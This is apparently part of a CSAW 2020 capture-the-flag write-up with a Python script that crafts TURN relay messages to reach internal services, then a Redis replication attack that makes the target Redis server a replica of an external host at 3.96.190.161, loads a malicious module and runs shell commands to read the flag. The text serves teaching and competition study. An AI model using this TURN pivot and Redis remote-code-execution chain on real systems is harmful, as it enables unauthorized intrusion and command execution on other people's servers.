bytearray.fromhex(v).decode() elif t == "002a": t = "CONNECTION-ID" v = int(v, 16) elif t == "0009": t = "ERROR-CODE" errorClass = str(int(v[:6])) errorNumber = v[6:8] error = bytearray.fromhex(v[8:]).decode() v = (errorClass + errorNumber + ": " + error) returnArr.append((t, l, v)) return returnArr def binToHex(fuck): # fuck packets fuckList = [ hex(int(fuck[4*i:4*(i+1)], 2))[2:] for i in range(0, len(fuck)//4) ] return ''.join(fuckList) def hexToIP(why): octets = [ str(int(why[2*i:2*(i+1)], 16)) for i in range(0, 4) ] return '.'.join(octets) def ipToDec(no): octets = no.split(".") return int(''.join([ hex(int(octet))[2:].zfill(2) for octet in octets ]), 16) def parseIP(v): family = v[2:4] # parse the stuff for QoL if family == "01": family = "IPv4" else: family = "IPv6" port = str(int(v[4:8], 16) ^ 0x2112) ip = hexToIP(hex(int(v[8:], 16) ^ 0x2112A442)[2:]) return (family, ip + ":" + port) transactionID = secrets.randbits(96) # it's a fucking uid why does it need to be cryptographically secure # initial allocation request HEADER = constructHeader(("allocation", "request"), 8, transactionID) print("Transaction ID is " + str(HEADER[1])) # log the id in case packet = HEADER[0] + constructAttribute("REQUESTED-TRANSPORT", "06000000") MESSAGE = bytearray.fromhex(packet) #print(MESSAGE) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TURN_IP, TURN_PORT)) s.send(MESSAGE) data = s.recv(BUFFER_SIZE) hexData = bytearray(data).hex() #print(hexData) print(decodeHeader(hexData[:40])) print(decodeMessage(hexData[40:])) data = xorIP("0.0.0.0", INTERNAL_PORT) HEADER = constructHeader(("connect", "request"), len("0001" + data[1] + data[0])//2 + 4, transactionID) packet = HEADER[0] + constructAttribute("XOR-PEER-ADDRESS", "0001" + data[1] + data[0]) MESSAGE = bytearray.fromhex(packet) #print(MESSAGE) s.send(MESSAGE) data = s.recv(BUFFER_SIZE) hexData = bytearray(data).hex() #print(hexData) print(decodeHeader(hexData[:40])) print(decodeMessage(hexData[40:])) connectionID = decodeMessage(hexData[40:])[0][2] print(connectionID) print("establishing new connection...\n") # ----------------------------------------------- s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((TURN_IP, TURN_PORT)) HEADER = constructHeader(("connectionbind", "request"), 8, transactionID) packet = HEADER[0] + constructAttribute("CONNECTION-ID", hex(connectionID)[2:].zfill(8)) MESSAGE = bytearray.fromhex(packet) #print(MESSAGE) s2.send(MESSAGE) data = s2.recv(BUFFER_SIZE) hexData = bytearray(data).hex() #print(hexData) #print(decodeHeader(hexData[:40])) #print(decodeMessage(hexData[40:])) (note, this script is still very buggy and there was stuff we fixed after the CTF. but this was what we used at the time.) Now, with this script, we could change the port on the line data = xorIP("0.0.0.0", INTERNAL_PORT) to connect to whatever internal service we wanted! (side note, around 4 AM we tried 127.0.0.1 for localhost, which gave us 403 Forbidden Address errors. i almost cried at this point, but i luckily tried 0.0.0.0, and it worked!) After trying some of the common ports, we located a Redis database on port 6379. Our plan was now to connect to the internal Redis database, and somehow exploit it to gain RCE. We found this exploit to gain RCE on a Redis database. The idea behind it was to set up a Redis database on your own computer, load a module which allowed the usage of shell commands, and then synchronize the local and target Redis databases using a MASTER/SLAVE system. However, at ~8 hours working, I couldn't get it working, so I went to bed. When I woke up, me and EhhThing worked on it more, and eventually got it to work! The following script was appended to the bottom of the previous solve script, with the INTERNAL_PORT set to 6379: s2.send(b'CONFIG SET dir /tmp/\r\n') print(s2.recv(4096).decode()) s2.send(b'CONFIG SET dbfilename dadadadad.so\r\n') print(s2.recv(4096).decode()) s2.send(b'SLAVEOF 3.96.190.161 1111\r\n') print(s2.recv(4096).decode()) time.sleep(5) s2.send(b'MODULE LOAD /tmp/dadadadad.so\r\n') print(s2.recv(4096).decode()) s2.send(b"SLAVEOF NO ONE\r\n") print(s2.recv(4096).decode()) s2.send(b"system.exec ls\r\n") print(s2.recv(4096).decode()) s2.send(b"system.exec cat /flag.txt\r\n") print(s2.recv(4096).decode()) And, after more than 10 hours of work, we got the flag! flag{[email protected]_all?}
https://brycec.me/posts/csaw2020quals_writeups
CC-MAIN-2022-21
refinedweb
2,161
55.95
Sencha Cmd 3.1.0.239 and ExtJS 4.2 theme questions using SASS Sencha Cmd 3.1.0.239 and ExtJS 4.2 theme questions using SASS - Join Date - Mar 2007 - Location - Gainesville, FL - 36,754 - Vote Rating - 827 After you generate a theme, in the package directory there should be a sass/etc, sass/src and sass/var. Are your SASS files in them? I hadn't had a problem getting it the package to build. FYI, we are prepping the docs for when the Cmd 3.1 GA comes out for all see those 3 folders but the sass/var & sass/src only have a Readme.md file and no other files. The sass/etc has a Readme.md & all.scss file. The problem is the all.scss file is blank when I open it. I tried adding my SASS code from my previous app.scss file into the all.scss but then when I build I get errors. Should all of these folders have a default SASS file with some starting code in them? - Join Date - Mar 2007 - Location - Gainesville, FL - 36,754 - Vote Rating - 827 No, they are blank directories (besides readme) as when you create a package it's a default package and that may or may not be a documentation or sample scss file to begin customizing a Theme via the new packages using SASS? In the previous version there was an app.scss file that included default SASS code like this. Code: @import 'ext4/default/all'; // You may remove any of the following modules that you do not use in order to create a smaller css-splitter; Code: //Grid Row $grid-row-cell-over-background-color: $very_light_blue; $grid-row-cell-alt-background: $extremely_light_blue; //Button $button-default-background-gradient: 'glossy-button' !default; Having the same problem. My custom scss files which i placed in the theme package etc folder and included them are not interpreted and not in the mytheme.css So same question how to include custom scss in the theme package?trainings / workshops / consulting: Sencha Touch / Ext JS Profile on SenchaDevs www: twitter: nilsdehl meetup: Sencha Touch / Ext JS Meetup Frankfurt videos: conference photos: My theme extends ext-theme-access. Copy from there sass/etc,sass/src,/sass/var as 'london_lawyer' described in Thread Sencha CMD - Theme Creation/Editing #6 for the grid-row change in: ..packages/mytheme/sass/var/panel/table.scss mitchellsimoens, Where are you gonna announce the new documentation for CMD 3.1 & package management ? I need to customize Neptune. I don't want to mess around without official documentation. I guess lot of people is waiting for docs, as well. Any release date ? Thanks.Using Ext with cachefly Working on LAMPExt Heads down on the docs now. In a nutshell to the above questions, the structure of SASS src and var folders is class-oriented. If you check out ext-theme-neptune you will see it has things like this: ./sass/var/grid/plugin/RowExpander.scss ./sass/src/grid/plugin/RowExpander.scss The organization of these is an exact mirror of the JavaScript classes to which they apply. In this case "Ext.grid.plugin.RowExpander". There is a config variable for packages (called package.sass.namespace) and for apps (called app.sass.namespace) that determines the JavaScript namespace that corresponds to the top-level folder. In theme packages, "package.sass.namespace=Ext" is the default. This means we don't need an "Ext" folder in ./sass/var and ./sass/src. To theme at the global scope, you would need to set this var to blank and create folders starting at the global namespace. Looking in the first file we see just this: Code: $row-expander-margin: 3px 3px 3px 3px !default; $row-expander-height: 11px !default; $row-expander-width: 11px !default; All files in var folders are included by "sencha package build" and "sencha app build" when building SASS. Within a package these files are ordered from base class to derived class as you might expect. The ./sass/src folder works similarly except that only the scss files for classes needed by the build (when building an app) are included. Within a package, these files are also included from base to derived order. Across packages, the base theme ./sass/src files come before those of the derived theme. This allows the cascade to always favor the derived theme. So you might see files like RowExpander.scss appear in many of the ./sass/var and ./sass/src across different themes. Each theme contributing its part. Obviously, if you have nothing to say about the variables or rules, you don't need to have a file in your theme. To carry forward more monolithic theme code without restructuring all the pieces to be class oriented, you can place your variables in ./sass/var/Component.scss or ./etc/all.scss (since that comes in even before vars) but vars is more appropriate for setting variables. You rules and other logic can go in ./sass/src/Component.scss as this will follow all of the base theme src such as its mixins. I hope this helps answer your questions. The Ext JS 4.2 RC1 release notes have some more on this -. ... back to the guide smithing....Don Griffin Ext JS Development Team Lead Check the docs. Learn how to (properly) report a framework issue and a Sencha Cmd issue "Use the source, Luke!" Thanks a lot. Now I have a much better idea.Using Ext with cachefly Working on LAMPExt Thread Participants: 17 - mysticav (2 Posts) - pmarko (1 Post) - mitchellsimoens (2 Posts) - mono blaine (2 Posts) - mrsunshine (1 Post) - gevik (1 Post) - dongryphon (8 Posts) - existdissolve (4 Posts) - zerosector (1 Post) - HriBB (1 Post) - asti (1 Post) - chrisjunkie (1 Post) - icheasty (1 Post) - svper (1 Post) - AwesomeBobX64 (1 Post) - twcarter (1 Post) - dwils (1 Post)
http://www.sencha.com/forum/showthread.php?258992
CC-MAIN-2014-35
refinedweb
975
67.76
Coding Utils¶ Evennia comes with many utilities to help with common coding tasks. Most are accessible directly from the flat API, otherwise you can find them in the evennia/utils/ folder. Searching¶ A common thing to do is to search for objects. The most common time one needs to do this is inside a command body. There it’s easiest to use the search method defined on all objects. This will search for objects in the same location and inside the caller: obj = self.caller.search(objname) Give the keyword global_search=True to extend search to encompass entire database. Also aliases with be matched by this search. You will find multiple examples of this functionality in the default command set. If you need to search for objects in a code module you can use the functions in evennia.utils.search. You can access these as shortcuts evennia.search_*. from evennia import search_object obj = search_object(objname) Note that these latter methods will always return a list of results, even if the list has one or zero entries. Create¶ Apart from the in-game build commands ( @create etc), you can also build all of Evennia’s game entities directly in code (for example when defining new create commands). import evennia # myobj = evennia.create_objects("game.gamesrc.objects.myobj.MyObj", key="MyObj") myscr = evennia.create_script("game.gamesrc.scripts.myscripts.MyScript", obj=myobj) helpentry = evennia.create_help_entry("Emoting", "Emoting means that ...") msg = evennia.create_message(senderobj, [receiverobj], "Hello ...") channel = evennia.create_channel("news") account = evennia.create_account("Henry", "henry@test.com", "H@passwd") Each of these create-functions have a host of arguments to further customize the created entity. See evennia/utils/create.py for more information. Logging¶ Normally you can use Python logger which will create proper logs either to terminal or to file. from evennia import logger # logger.log_err("This is an Error!") logger.log_warn("This is a Warning!") logger.log_info("This is normal information") logger.log_dep("This feature is deprecated") There is a special log-message type, log_trace() that is intended to be called from inside a traceback - this can be very useful for relaying the traceback message back to log without having it kill the server. try: # [some code that may fail...] except Exception: logger.log_trace("This text will show beneath the traceback itself.") The log_file logger, finally, is a very useful logger for outputting arbitrary log messages. This is a heavily optimized asynchronous log mechanism using threads to avoid overhead. You should be able to use it for very heavy custom logging without fearing disk-write delays. logger.log_file(message, filename="mylog.log") If not an absolute path is given, the log file will appear in the mygame/server/logs/ directory. If the file already exists, it will be appended to. Timestamps on the same format as the normal Evennia logs will be automatically added to each entry. If a filename is not specified, output will be written to a file game/logs/game.log. Game time¶ Evennia tracks the current server time. You can access this time via the evennia.gametime shortcut: from evennia import gametime # all the functions below return times in seconds). # total running time of the server runtime = gametime.runtime() # time since latest hard reboot (not including reloads) uptime = gametime.uptime() # server epoch (its start time) server_epoch = gametime.server_epoch() # in-game epoch (this can be set by `settings.TIME_GAME_EPOCH`. # If not, the server epoch is used. game_epoch = gametime.game_epoch() # in-game time passed since time started running gametime = gametime.gametime() # in-game time plus game epoch (i.e. the current in-game # time stamp) gametime = gametime.gametime(absolute=True) # reset the game time (back to game epoch) gametime.reset_gametime() The setting TIME_FACTOR determines how fast/slow in-game time runs compared to the real world. The setting TIME_GAME_EPOCH sets the starting game epoch (in seconds). The functions from the gametime module all return their times in seconds. You can convert this to whatever units of time you desire for your game. You can use the @time command to view the server time info. You can also schedule things to happen at specific in-game times using the gametime.schedule function: import evennia def church_clock: limbo = evennia.search_object(key="Limbo") limbo.msg_contents("The church clock chimes two.") gametime.schedule(church_clock, hour=2) utils.time_format()¶ This function takes a number of seconds as input (e.g. from the gametime module above) and converts it to a nice text output in days, hours etc. It’s useful when you want to show how old something is. It converts to four different styles of output using the style keyword: - style 0 - 5d:45m:12s(standard colon output) - style 1 - 5d(shows only the longest time unit) - style 2 - 5 days, 45 minutes(full format, ignores seconds) - style 3 - 5 days, 45 minutes, 12 seconds(full format, with seconds) utils.inherits_from()¶ This useful function takes two arguments - an object to check and a parent. It returns True if object inherits from parent at any distance (as opposed to Python’s in-built is_instance() that will only catch immediate dependence). This function also accepts as input any combination of classes, instances or python-paths-to-classes. Note that Python code should usually work with duck typing. But in Evennia’s case it can sometimes be useful to check if an object inherits from a given Typeclass as a way of identification. Say for example that we have a typeclass Animal. This has a subclass Felines which in turn has a subclass HouseCat. Maybe there are a bunch of other animal types too, like horses and dogs. Using inherits_from will allow you to check for all animals in one go: from evennia import utils if (utils.inherits_from(obj, "typeclasses.objects.animals.Animal"): obj.msg("The bouncer stops you in the door. He says: 'No talking animals allowed.'") utils.delay()¶ This is a thin wrapper around a Twisted construct called a deferred. It simply won’t return until a given number of seconds have passed, at which time it will trigger a given callback with whatever argument. This is a small and lightweight (non-persistent) alternative to a full Scripts. Contrary to a Script it can also handle sub-second timing precision (although this is not something you should normally need to worry about). Some text utilities¶ In a text game, you are naturally doing a lot of work shuffling text back and forth. Here is a non-complete selection of text utilities found in evennia/utils/utils.py (shortcut evennia.utils). If nothing else it can be good to look here before starting to develop a solution of your own. utils.fill()¶ This flood-fills a text to a given width (shuffles the words to make each line evenly wide). It also indents as needed. outtxt = fill(intxt, width=78, indent=4) utils.crop()¶ This function will crop a very long line, adding a suffix to show the line actually continues. This can be useful in listings when showing multiple lines would mess up things. intxt = "This is a long text that we want to crop." outtxt = crop(intxt, width=19, suffix="[...]") # outtxt is now "This is a long text[...]" utils.dedent()¶ This solves what may at first glance appear to be a trivial problem with text - removing indentations. It is used to shift entire paragraphs to the left, without disturbing any further formatting they may have. A common case for this is when using Python triple-quoted strings in code - they will retain whichever indentation they have in the code, and to make easily-readable source code one usually don’t want to shift the string to the left edge. #python code is entered at a given indentation intxt = """ This is an example text that will end up with a lot of whitespace on the left. It also has indentations of its own.""" outtxt = dedent(intxt) # outtxt will now retain all internal indentation # but be shifted all the way to the left. Normally you do the dedent in the display code (this is for example how the help system homogenizes help entries). text conversion()¶ Evennia supplies two utility functions for converting text to the correct encodings. to_str() and to_unicode(). The difference from Python’s in-built str() and unicode() operators are that the Evennia ones makes use of the ENCODINGS setting and will try very hard to never raise a traceback but instead echo errors through logging. See here for more info. Making ascii tables¶ The EvTable class ( evennia/utils/evtable.py) can be used to create correctly formatted text tables. There is also EvForm ( evennia/utils/evform.py). This reads a fixed-format text template from a file in order to create any level of sophisticated ascii layout. Both evtable and evform have lots of options and inputs so see the header of each module for help. The third-party PrettyTable module is also included in Evennia. PrettyTable is considered deprecated in favor of EvTable since PrettyTable cannot handle ANSI colour. PrettyTable can be found in evennia/utils/prettytable/. See its homepage above for instructions.
http://evennia.readthedocs.io/en/latest/Coding-Utils.html
CC-MAIN-2018-13
refinedweb
1,510
58.79
Is there a good reason to not Unix-style mangle your From line in an SMTP email header? For context, I've been looking at several examples lately of ways to properly send email potentially containing UTF-8 characters to email addresses also potentially containing UTF-8 characters from Python 2.7 using smtplib. One thing I came across in a few examples was people electing to use an From header mangling behavior. My understanding is that this mangling behavior (converting the From header from "From" to ">From") is in place in order to ensure compatibility with various Unix systems. (I enjoyed reading the ranting explanations of this mangling behavior from the Unix Haters mailing list, for anyone interested in the reasoning behind this behavior). According to the Python 2.7 docs on generating MIME documents, mangling the From line in this way... [...] is the only guaranteed portable way to avoid having such lines be mistaken for a Unix mailbox format envelope header separator So, I want to know if there is a good reason to adopt a practice of not mangling the From header as best practice. Does anyone have any experience with this? - HTML Emails - Creating 20 versions by data? Every week, I send out an Email with 20 versions. The only difference in each version is a set of data (A name, email address and telephone number). At the moment, I create the 20 versions and enter this manually, but the dream is to generate one email, and use variables to pull in the data externally and populate 20 versions. The issue I have, is the 20 versions need to all be external .html files, which would have the variables already entered on build. So If I had a variable [telephone] this would be 1234567890 on version 1, 123456778 on version 2 etc. I assume this would be a custom build, but if anyone has an idea of a starting point that'd be awesome! - Sending mail through SMTP with different email from different account I have sending emails using SMTP server in my ASP.NET MVC applcaition, find the code i have used below, MailMessage Msg = new MailMessage(); Msg.From = new MailAddress("MyAccount@company.com"); //same); The above code works fine, but I need to send email from different from address with same credentials like below, MailMessage Msg = new MailMessage(); Msg.From = new MailAddress("anotherAccount@company.com"); //different); This will returns error message as Additional information: Mailbox unavailable. The server response was: 5.7.60 SMTP; Client does not have permissions to send as this sender Is this possible to send like this using above code, anything I missed? Thanks, Nagaraj M. - Execl in unix system my question is about execl. let say, ı create one process and in a process ı create fork().Then ı create a new program with execl() in fork(). my question is, if ı write getppid() in execl's program, what ı can get. ı can get init id of shell id ? thank you for answers. - In shell script to find and replace string in file using variable? I want shell script to find my 'Orignal_literal' and change it with dynamic literal, this literal would be runtime input to script. - macOS oddly kernel panic (likely Darwin XPC related) Configuration:Macbook Pro 11,5 with macOS 10.13.1(Filevault-enabled) On Nov 13, after I leave the computer for 20 minutes, it has unable to wake from sleep. I halted it and investigated the software 4 days later. Some log information pointed out that it's likely caused by Darwin XPC. Just 2 weeks ago, I entered Recovery OS and copied sleepimage(on disk1s4) to desktop. When I tried to open it using hex editor, it prompt "XPC_SERVICE_CORE" on filename, then crashed. I zipped it, and the .zip package has only 1M size! I think this may be only a symbol file and it caused the kernel panic. I'm not an expert of Darwin, so I zipped and uploaded /var/log/ and sleepimage and asking for help. Thanks! - Windows C++ multibyte / unicode In Windows C++ multibyte / unicode considerations, I notice that _tcslen() and lstrlen() both provide a string's length correctly regardless of whether you're compiling to multibyte or unicode. _tcslen() is defined in TCHAR.H based on the def _UNICODE and lstrlen() is defined in WINBASE.H based on the def UNICODE. Did someone just re-invent the wheel at some point or is there a reason for this apparent duplication? - Displaying unicode characters from its decimal or hexa value I have tried different methods with different encodings like UTF-8 and ISO_8859_1 to correctly display unicode characters. To no avail. Here is a unit test that shows some of the things I tried. I appreciate your insight. @Test public void unicode_conversation_isCorrect() throws Exception { int decimalHi = 1202; int hexaHi = 0x4B2; String unicodeHi = Integer.toString(decimalHi); unicodeHi = "\\u" + unicodeHi; String unicodeHiHex = Integer.toHexString(hexaHi); String ethiopicHi = "\u1202"; char[] decCharArray = Character.toChars(decimalHi); String deciStr = ""; for (char c : decCharArray) { deciStr = deciStr + c; } assertEquals("ሂ", "\u1202"); //succeeds assertEquals("ሂ", ethiopicHi); //succeeds assertEquals("ሂ", deciStr); //fails. Expected :ሂ Actual :Ҳ assertEquals("ሂ", unicodeHi); //fails. Expected :ሂ Actual :\u1202 } - Compare iterated character from std::string with unicode C++ i've been struggling with this problem for quite some time and this is my first for dealing with unicode or UTF-8 basically. This is what i'm trying to do, I just want to iterate a std::string containing with combination from normal alphabet and a unicode symbol, which in my case is en dash "–". more info: this is the code that i've tried and it won't run: #include <iostream> #include <string> int main() { std::string str = "test string with symbol – and !"; for (auto &letter : str) { if (letter == "–") { std::cout << "found!" << std::endl; } } return 0; } This is the result of my compiler: main.cpp: In function 'int main()': main.cpp:18:23: error: ISO C++ forbids comparison between pointer and integer [-fpermissive] if (letter == "–") { ^ also, when i was looking through the internet i found an interesting information for this type of task that i need to solve. How to search a non-ASCII character in a c++ string? But when i tried to modified my code with those UTF-8 hex code, it also won't run: if (letter == "\xE2\x80\x93") { std::cout << "found!" << std::endl; } with the exact same message from my compiler, which is c++ forbids comparison between pointer and integer. Did i miss something? or do i need to use libraries like ICU or Boost? Your help is much appreciated. thank you! Update based on the answer from UnholySheep, i've been improving my code but it's still cannot work. it can pass the compiling but when i tried to run it, it can't ouput "found!" to out. so, how do i solve this? thank you. - Failed Gmail authentication through smtplib and AWS Lambda I'm trying to write an AWS Lambda function that periodically sends an email using Python's smtplib. This function works outside of AWS lambda, and I've verified that the environment variables are valid many times. import os import smtplib def lambda_handler(event, context): """Function that runs to send the email.""" otf_email = os.environ.get("OTF_EMAIL") my_email = os.environ.get("MY_EMAIL") pw = os.environ.get("GMAIL_PW") body = 'Subject:\nThis is a test from the AWS lambda function.' smtp_obj = smtplib.SMTP('smtp.gmail.com', 587) smtp_obj.ehlo() smtp_obj.starttls() smtp_obj.login(my_email, pw) smtp_obj.sendmail(my_email, otf_email, body) smtp_obj.sendmail(my_email, my_email, body) smtp_obj.quit() The first part of the error: "errorMessage": "(534, b'5.7.14 <\\n5.7.14 vlSLqK014L_ddv0GicpBkQ1o229bk_zYZe8gMUGlddfJLox0EnXFwtUl9GpBygMxCzoATW\\n5.7.14 3UjdqLIvkTcUx6vGO09gE33_CMkdMaVK-F1d8FC4SypPh8n3ft6BaZubjr4b_M7FD2roiN\\n5.7.14 LyTNxCogmPGDqNQP8overGbbDNTZ7rdeEGBYqG9dExVjtqnRda6eEwC9e9Ib8zHfsjASRM\\n5.7.14 Zi8ShH9zxelYTJ-IhALwvPFV0pJIg> Please log in via your web browser and\\n5.7.14 then try again.\\n5.7.14 Learn more at\\n5.7.14 u131sm4947518pgc.89 - gsmtp')" - smtplib.SMTP.sendmail raise exception but its str is (250, 'ok') try: if not self.check_smtp_connected("main", self.sender_addr): self.close("main", self.sender_addr) if not self.connect("main", self.sender_addr): self.last_error = "req_id:%d,connect to %s main failed" % (mail_id, self.name) raise Exception("req_id:%d,connect to %s main failed" % (mail_id, self.name)) sender_addr = parseaddr(self.msg['From'])[1] recv_addr = parseaddr(self.msg['To'])[1] self.smtp_conns[self.sender_addr].sendmail(self.msg['From'], self.msg['To'], self.msg.as_string()) except Exception as e: glogger.warning("req_id:%d,send mail by %s failed, error: %s" % (mail_id, self.name, str(e))) else: sent_succ = True break check_smtp_connected use noop()[0] to check connection to smtp server. the first time I get : req_id:7066283,send mail by tx_smtp failed, error: timed out so the exception is time out and then I use check_smtp_connected to check the connection, it's broken. the second time I get: req_id:7066283,send mail by tx_smtp failed, error: (250, 'Ok') so the exception is (250, 'Ok') I read source code of sendmail, but can't find the branch that will raise this exception. so I'm heavily puzzled. and the result is my mailbox get two mail
http://quabr.com/47297103/is-there-a-good-reason-to-not-unix-style-mangle-your-from-line-in-an-smtp-email
CC-MAIN-2017-47
refinedweb
1,520
58.18
view raw I am receiving this message when trying to execute script whether in virtual environment or a normal Python shell. File "/home/pi/facesample1.py", line 10, in <module> gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY) error: /home/pi/opencv-3.1.0/modules/imgproc/src/color.cpp:8000: error: (-215) scn == 3 || scn == 4 in function cvtColor import cv2 #Load an image from file image = cv2.imread("fronthead.jpg", 1) #Load a cascade file for detecting faces face_cascade = cv2.CascadeClassifier('/usr/share/opencv,0,0),2) #Save the result image cv2.imwrite('camresult.jpg',image) Your image variable is apparently not a 3 or 4 channel image. Thus, cvtColor() is unable to transform it to grayscale. Check image.shape and see that it returns something with the right dimensions (i.e. a 3D array with last dimension 3 or 4). It is also quite possible that image is None, which usually means that the path to the file is wrong.
https://codedump.io/share/CDFOmB1547Sp/1/raspberry-pi-3-python-and-opencv-for-facial-recognition
CC-MAIN-2017-22
refinedweb
161
51.34
First of all, my english's very poor, sorry. I wanted to know if there is any form to transform what you paint in a panel to an image you can save. I want to use the functions to draw rectangles, which draw them in a panel, instead of using the functions that paint pixel to pixel. picture :: Window a -> Var Color -> Var Color -> Var Color -> Var Color -> Var Color -> Var Int -> Var Int -> Var Int -> Var Int -> Var Int -> IO () picture w cl1 cl2 cl3 cl4 current alt anc num altr ancr ... let rgbSize = sz an al im <- imageCreateSized rgbSize imv <- varCreate im bim <- bitmapCreateDefault bimv <- varCreate bim ... guardar <- button f [text := "Guardar",on command :=do imagen <-varGet imv; salvarimagen f imagen] ... p <- panel f [clientSize := sz an al] ... set p [on paint := pintarect imv bimv var] where pintarect imv bimv var dc viewArea = do v <- varGet var ... randomcolours cl1 cl2 cl3 cl4 current curre <- varGet current drawRect dc (Rect 6 44 100 50) [penWidth := 6, brushColor := curre] bim <- bitmapCreateDefault dcDrawBitmap dc bim pointZero True if (v==0) then do varSet bimv bim im <- imageCreateFromBitmap bim print v varSet imv im varSet var 1 else do print v bim <- varGet bimv drawBitmap dc bim pointZero True [] return () salvarimagen :: Dialog a -> Image a -> IO () --This is the dialog for saving the image Well, the code of pintarect is with print and other things to help me debugging. The function is supposed to draw random pictures, it's called with variables which will change in pintarect, I want they keep the same the next events of paint, but everytime there is an event of paint, the colours change. Other problem is when I save the file, it's always empty, I suppose it's because dcDrawBitmap doesn´t convert the dc to a bitmap, the name confused me. Is there any form to paint in the dc and save that to a file??? Thanks. ______________________________________________ Renovamos el Correo Yahoo!: ¡250 MB GRATIS! Nuevos servicios, más seguridad I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/wxhaskell/mailman/wxhaskell-users/?viewmonth=200412&style=flat&viewday=13
CC-MAIN-2017-22
refinedweb
378
67.49
Introduction I don't need to tell most of you how important serialization is in your programs. If today is the first time you come across the term Serialization, I'd suggest reading here before continuing. Being able to serialize and deserialize information in your apps is a very important feature to have. Being able to save and load information stored is crucial. There are many ways to serialize data, but it all depends on your program's needs. You can serialize info into and from the registry; you can store and load info from a database, or from a file. Today we will save info to an xml file and load it from that xml file. Design We will be using a very basic design, have a look at Figure 1, and design your form similar to it.We will be using a very basic design, have a look at Figure 1, and design your form similar to it. Figure 1 - Our Design Coding I decided that instead of serializing basic tidbits of data, to throw a spanner in the works and demonstrate how to save real objects created from code. For this demonstration we will create a new class called clsStudent and give it some properties. These properties will be the information we will serialize. Let us add a new class now, and edit its code. clsStudent Add the necessary namespace(s), in General Declarations: Imports System.Xml.Serialization 'The Serialization namespace contains classes that are used to serialize objects into XML format documents or streams Now, let us add the Student Class' member variables: Private strName As String 'Name Member Variable Private strCourse As String 'Course Member Variable Private intStuNo As Integer 'StudentNumber Member Variable The above member variables will be used in conjunction with our class' properties (which we will add now) to get and set their values. Let us add the Properties now. 'Gets / Sets Student Name Public Property StudentName() As String Get StudentName = strName End Get Set(ByVal Value As String) strName = Value End Set End Property 'Gets / Sets Student's Course Public Property StudentCourse() As String Get StudentCourse = strCourse End Get Set(ByVal Value As String) strCourse = Value End Set End Property 'Gets / Sets StudentNumber <XmlElementAttribute(ElementName:="Student Number")> _ Public Property StudentNumber() As Integer Get StudentNumber = intStuNo End Get Set(ByVal Value As Integer) intStuNo = Value End Set End Property You can probably tell what the above code does. We simply give our Student class some properties. These properties include StudentName (for the Student's name), StudentCourse (what course the student does) and StudentNumber (the student's student number). We need to connect our student class, and from there populate it with our form's controls. Finally, we must serialize and deserialize the entered info. frmSD ( or However You Named It ) Let us start with the namespaces again. I always start with the namespaces - old habits die hard I suppose. Add the following two namespaces to your form's general declarations section: Imports System.IO 'File Input & Output Imports System.Xml.Serialization 'The Serialization namespace contains classes that are used to serialize objects into XML format documents or streams Let us now add the serialization code: Private Sub btnS_Click(sender As Object, e As EventArgs) Handles btnS.Click 'Instantiate new Student object Dim stu As New clsStudent() 'Information to save stu.StudentName = txtName.Text stu.StudentCourse = txtCourse.Text stu.StudentNumber = Convert.ToInt16(txtStuNum.Text) 'Serialize student object to an XML file, via the use of StreamWriter Dim objStreamWriter As New StreamWriter("C:\StudentInfo.xml") Dim xsSerialize As New XmlSerializer(stu.GetType) 'Determine what object types are present xsSerialize.Serialize(objStreamWriter, stu) 'Save objStreamWriter.Close() 'Close File End Sub We created a new clsStudent object, and populated it with whatever data was entered into the textboxes. Note, if you have named your objects differently, you will have to compensate for that in your code. We then created a StreamWriter object, which will create our file on the C drive, called StudentInfo.xml. We created an XmlSerializer object that will facilitate in the serializing of our data. Lastly we wrote our entered data, and closed the file. Let us add the Deserialization code: Private Sub btnD_Click(sender As Object, e As EventArgs) Handles btnD.Click 'Deserialize XML file to a new Student object. Dim objStreamReader As New StreamReader("C:\StudentInfo.xml") 'Read File Dim stu As New clsStudent() 'Instantiate new Student Object Dim xsDeserialize As New XmlSerializer(stu.GetType) 'Get Info present stu = xsDeserialize.Deserialize(objStreamReader) 'Deserialize / Open objStreamReader.Close() 'Close Reader 'Display values of the new student object txtName.Text = stu.StudentName txtCourse.Text = stu.StudentCourse txtStuNum.Text = CStr(stu.StudentNumber) End Sub Same principle as the serialization, but we just load the info with the help of the Deserialize method of the XmlSerializer object and load the info into our textboxes. If you run your project now, you will be able to save your entered data, and then load them. I am including the source files below. Conclusion As always, (you may say that I sound like a broken record sometimes - blame it on my O. C. D.) I hope you have enjoyed this little article, and that you have learned something from it. Until next time! Cheers! - I always say that too...
http://mobile.codeguru.com/columns/vb/serializing-deserializing-objects-with-vb.net-2012.htm
CC-MAIN-2017-43
refinedweb
881
54.73
Entity or other in ApllicationWindow Hello I'm trying to figure out how to show in the applicationwindow an entity with a mesh, first I do not know if you can do I find nothing on the documentation, could you help me or show me the right path? Thank you import QtQuick.Controls 1.4 import QtQuick 2.2 as QQ2 import Qt3D.Core 2.0 import Qt3D.Render 2.0 import Qt3D.Input 2.0 import Qt3D.Extras 2.0 ApplicationWindow { id: window visible: true menuBar: MenuBar { Menu { title: "File" MenuItem { text: "OpenFile" } MenuItem { text: "Close" } } Menu { title: "Edit" MenuItem { text: "Cut" } MenuItem { text: "Copy" } MenuItem { text: "Paste" } } } Entity{ id: entityMesh ancor://????? } } There are examples on how to use Qt3D included in QtCreator. When you start QtCreator the topmost entry in the left views list (where Edit, Debug, etc. is) says Welcome. In there click on examples and search for 3D. There is for example the Qt3D Materials QML example. This should get you started. Good morning I understand where to start, but I wanted to put the classic menu File-> OpenFile but I can not figure out how to integrate it in the window. I would like to put the menuBar in this project as you would do?
https://forum.qt.io/topic/87324/entity-or-other-in-apllicationwindow
CC-MAIN-2018-09
refinedweb
210
67.35
